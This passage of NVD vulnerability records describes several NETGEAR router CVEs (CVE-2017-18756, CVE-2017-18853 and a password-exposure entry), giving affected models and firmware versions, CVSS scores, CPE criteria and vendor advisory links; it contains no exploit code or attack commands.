}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D6220 before 1.0.0.32, D6400 before 1.0.0.66, D8500 before 1.0.3.35, DGN2200Bv4 before 1.0.0.94, DGN2200v4 before 1.0.0.94, R6250 before 1.0.4.14, R6300v2 before 1.0.4.18, R6400 before 1.01.32, R6400v2 before 1.0.2.44, R6700 before 1.0.1.36, R6900 before 1.0.1.30, R6900P before 1.3.0.8, R7000 before 1.0.9.14, R7000P before 1.3.0.8, R7100LG before 1.0.0.34, R7900 before 1.0.2.4, R8000 before 1.0.4.2, WN2500RPv2 before 1.0.1.50, WNDR3400v3 before 1.0.1.14, and WNDR4000 before 1.0.2.10."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una configuraci\u00f3n incorrecta de los ajustes de seguridad. Esto afecta a D6220 versiones anteriores a 1.0.0.32, D6400 versiones anteriores a 1.0.0.66, D8500 versiones anteriores a 1.0.3.35, DGN2200Bv4 versiones anteriores a 1.0.0.94, DGN2200v4 versiones anteriores a 1.0.0.94, R6250 versiones anteriores a 1.0.4.14, R6300v2 versiones anteriores a 1.0.4.18, R6400 versiones anteriores a 1.01.32, R6400v2 versiones anteriores a 1.0.2.44, R6700 versiones anteriores a 1.0.1.36, R6900 versiones anteriores a 1.0.1.30, R6900P versiones anteriores a 1.3.0.8, R7000 versiones anteriores a 1.0.9.14, R7000P versiones anteriores a 1.3.0.8, R7100LG versiones anteriores a 1.0.0.34, R7900 versiones anteriores a 1.0.2.4, R8000 versiones anteriores a 1.0.4.2, WN2500RPv2 versiones anteriores a 1.0.1.50, WNDR3400v3 versiones anteriores a 1.0.1.14 y WNDR4000 versiones anteriores a 1.0.2.10."
}
],
"id": "CVE-2017-18756",
"lastModified": "2024-11-21T03:20:50.677",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-22T17:15:11.870",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051492/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2756"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051492/Security-Advisory-for-Security-Misconfiguration-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2756"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-noinfo"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-29 14:15
Modified
2024-11-21 03:21
Severity ?
Summary
Certain NETGEAR devices are affected by password recovery and file access. This affects D8500 1.0.3.27 and earlier, DGN2200v4 1.0.0.82 and earlier, R6300v2 1.0.4.06 and earlier, R6400 1.0.1.20 and earlier, R6400v2 1.0.2.18 and earlier, R6700 1.0.1.22 and earlier, R6900 1.0.1.20 and earlier, R7000 1.0.7.10 and earlier, R7000P 1.0.0.58 and earlier, R7100LG 1.0.0.28 and earlier, R7300DST 1.0.0.52 and earlier, R7900 1.0.1.12 and earlier, R8000 1.0.3.46 and earlier, R8300 1.0.2.86 and earlier, R8500 1.0.2.86 and earlier, WNDR3400v3 1.0.1.8 and earlier, and WNDR4500v2 1.0.0.62 and earlier.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | d8500_firmware | * | |
| netgear | d8500 | - | |
| netgear | dgn2200_firmware | * | |
| netgear | dgn2200 | v4 | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | - | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r7000p_firmware | * | |
| netgear | r7000p | - | |
| netgear | r7100lg_firmware | * | |
| netgear | r7100lg | - | |
| netgear | r7300dst_firmware | * | |
| netgear | r7300dst | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r8300_firmware | * | |
| netgear | r8300 | - | |
| netgear | r8500_firmware | * | |
| netgear | r8500 | - | |
| netgear | wndr3400_firmware | * | |
| netgear | wndr3400 | v3 | |
| netgear | wndr4500_firmware | * | |
| netgear | wndr4500 | v2 |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3CABB269-2967-49F4-B8E8-66825747EB97",
"versionEndIncluding": "1.0.3.27",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B4B809BE-307B-4309-A333-DB5E7722F8A2",
"versionEndIncluding": "1.0.0.82",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C38C75CA-2B68-4D85-B1FC-3CF9281D5D1B",
"versionEndIncluding": "1.0.4.06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "11AA26A0-5DAA-46B6-B7B8-E34DB439ABDC",
"versionEndIncluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7C9D4FA9-A99B-4931-B89E-247EB64567AA",
"versionEndIncluding": "1.0.2.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3AC00FC1-A271-477A-B22C-4C58D0915B28",
"versionEndIncluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A231747C-B62D-445E-8A1E-B233FC057A14",
"versionEndIncluding": "1.0.1.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8B34F561-E662-498D-824A-DD4358334396",
"versionEndIncluding": "1.0.7.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6B773066-41DF-4EFF-A063-20063C49856D",
"versionEndIncluding": "1.0.0.58",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D4B29972-7657-41E4-AB1D-F2183479927E",
"versionEndIncluding": "1.0.0.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "83A30682-9882-46FA-8690-C33B9006F54C",
"versionEndIncluding": "1.0.0.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5ABC8087-5B43-4C05-B210-3D5519D76B7B",
"versionEndIncluding": "1.0.1.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3C59B5FF-EB54-4CFE-AF59-FCD090847F00",
"versionEndIncluding": "1.0.3.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C51DBE7B-AC3B-4BB3-91D9-7AA679676B49",
"versionEndIncluding": "1.0.2.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5DEA7DEA-328B-40B7-865E-88797DEB3965",
"versionEndIncluding": "1.0.2.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F271857E-66B1-4AC3-8C8B-07A9C96BB066",
"versionEndIncluding": "1.0.1.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr4500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FFA07BD5-8D6F-4F1D-A227-BDD67DD8D152",
"versionEndIncluding": "1.0.0.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr4500:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "AB00ECAD-7474-4D85-8248-D014E5808814",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by password recovery and file access. This affects D8500 1.0.3.27 and earlier, DGN2200v4 1.0.0.82 and earlier, R6300v2 1.0.4.06 and earlier, R6400 1.0.1.20 and earlier, R6400v2 1.0.2.18 and earlier, R6700 1.0.1.22 and earlier, R6900 1.0.1.20 and earlier, R7000 1.0.7.10 and earlier, R7000P 1.0.0.58 and earlier, R7100LG 1.0.0.28 and earlier, R7300DST 1.0.0.52 and earlier, R7900 1.0.1.12 and earlier, R8000 1.0.3.46 and earlier, R8300 1.0.2.86 and earlier, R8500 1.0.2.86 and earlier, WNDR3400v3 1.0.1.8 and earlier, and WNDR4500v2 1.0.0.62 and earlier."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una recuperaci\u00f3n de la contrase\u00f1a y el acceso a los archivos. Esto afecta a D8500 versiones 1.0.3.27 y anteriores, DGN2200v4 versiones 1.0.0.82 y anteriores, R6300v2 versiones 1.0.4.06 y anteriores, R6400 versiones 1.0.1.20 y anteriores, R6400v2 versiones 1.0.2.18 y anteriores, R6700 versiones 1.0.1.22 y anteriores, R6900 versiones 1.0.1.20 y anteriores, R7000 versiones 1.0.7.10 y anteriores, R7000P versiones 1.0.0.58 y anteriores, R7100LG versiones 1.0.0.28 y anteriores, R7300DST versiones 1.0.0.52 y anteriores, R7900 versiones 1.0.1.12 y anteriores, R8000 versiones 1.0.3.46 y anteriores, R8300 versiones 1.0.2.86 y anteriores, R8500 versiones 1.0.2.86 y anteriores, WNDR3400v3 versiones 1.0.1.8 y anteriores, y WNDR4500v2 versiones 1.0.0.62 y anteriores."
}
],
"id": "CVE-2017-18853",
"lastModified": "2024-11-21T03:21:05.863",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.6,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 6.0,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-29T14:15:12.370",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000045848/Security-Advisory-for-Password-Recovery-and-File-Access-on-Some-Routers-and-Modem-Routers-PSV-2017-0677"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000045848/Security-Advisory-for-Password-Recovery-and-File-Access-on-Some-Routers-and-Modem-Routers-PSV-2017-0677"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-200"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-28 17:15
Modified
2024-11-21 02:45
Severity ?
Summary
Certain NETGEAR devices are affected by password exposure. This affects AC1450 before 2017-01-06, C6300 before 2017-01-06, D500 before 2017-01-06, D1500 before 2017-01-06, D3600 before 2017-01-06, D6000 before 2017-01-06, D6100 before 2017-01-06, D6200 before 2017-01-06, D6200B before 2017-01-06, D6300B before 2017-01-06, D6300 before 2017-01-06, DGN1000v3 before 2017-01-06, DGN2200v1 before 2017-01-06, DGN2200v3 before 2017-01-06, DGN2200V4 before 2017-01-06, DGN2200Bv3 before 2017-01-06, DGN2200Bv4 before 2017-01-06, DGND3700v1 before 2017-01-06, DGND3700v2 before 2017-01-06, DGND3700Bv2 before 2017-01-06, JNR1010v1 before 2017-01-06, JNR1010v2 before 2017-01-06, JNR3300 before 2017-01-06, JR6100 before 2017-01-06, JR6150 before 2017-01-06, JWNR2000v5 before 2017-01-06, R2000 before 2017-01-06, R6050 before 2017-01-06, R6100 before 2017-01-06, R6200 before 2017-01-06, R6200v2 before 2017-01-06, R6220 before 2017-01-06, R6250 before 2017-01-06, R6300 before 2017-01-06, R6300v2 before 2017-01-06, R6700 before 2017-01-06, R7000 before 2017-01-06, R7900 before 2017-01-06, R7500 before 2017-01-06, R8000 before 2017-01-06, WGR614v10 before 2017-01-06, WNR1000v2 before 2017-01-06, WNR1000v3 before 2017-01-06, WNR1000v4 before 2017-01-06, WNR2000v3 before 2017-01-06, WNR2000v4 before 2017-01-06, WNR2000v5 before 2017-01-06, WNR2200 before 2017-01-06, WNR2500 before 2017-01-06, WNR3500Lv2 before 2017-01-06, WNDR3400v2 before 2017-01-06, WNDR3400v3 before 2017-01-06, WNDR3700v3 before 2017-01-06, WNDR3700v4 before 2017-01-06, WNDR3700v5 before 2017-01-06, WNDR4300 before 2017-01-06, WNDR4300v2 before 2017-01-06, WNDR4500v1 before 2017-01-06, WNDR4500v2 before 2017-01-06, and WNDR4500v3 before 2017-01-06.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ac1450_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "32794415-73D5-4C63-BCAB-FA324BBCE850",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ac1450:-:*:*:*:*:*:*:*",
"matchCriteriaId": "E4BA18B2-8234-4C26-B865-741D467C5EBE",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:c6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4DC0FCBB-5F1B-417C-8E4B-FBD403CF2E38",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:c6300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7185DE0B-B15C-417D-9AF5-FBF15F9C2241",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d1500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "56141687-D086-4EEE-9F8A-C238CC26854E",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d1500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "78DC8809-C26D-48D8-9E12-228C3669B824",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d3600_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B175146A-AA48-4A89-9712-E87BBB0B389F",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d3600:-:*:*:*:*:*:*:*",
"matchCriteriaId": "31DE9D4E-3CDC-4552-A63F-DD5D95E23F63",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DD7FA616-CD66-488A-92ED-3F28954F9E45",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3CE070E3-C0B1-455F-83A9-5C60C489816F",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D53F8CC0-F707-4F98-85CE-9A816BE39809",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "6F6EA344-FF99-4F27-9860-3C5BE07345A7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8D349BA3-DF82-4DD5-BDA6-6AB5F3B70BD3",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7EFD1E86-F100-4E46-935D-903EB6FEFE9D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F22E4FA5-DB96-4946-86B1-0D18A3BEBB2A",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "00E6A1B7-4732-4259-9B71-10FF0B56A16B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DFEBB6A6-EABA-4A04-8B49-3C9F64D7C5C6",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6200b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "60FAC76D-96D6-41FB-8EE8-C25F3CBB3307",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2EC71979-23F7-4623-BE4A-82713E95DACD",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "78542C95-85CC-43E5-9F0E-B12DDD5B79C4",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6300b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "357F14D2-06B8-4BA5-9D7E-B334F59C7250",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6300b:-:*:*:*:*:*:*:*",
"matchCriteriaId": "37B89703-CAFB-43F6-8880-90349F8ED856",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn1000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "BEFBB234-2155-45F8-933D-93E89EC1F54F",
"versionEndExcluding": "2017-01-06",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn1000:v3:*:*:*:*:*:*:*",
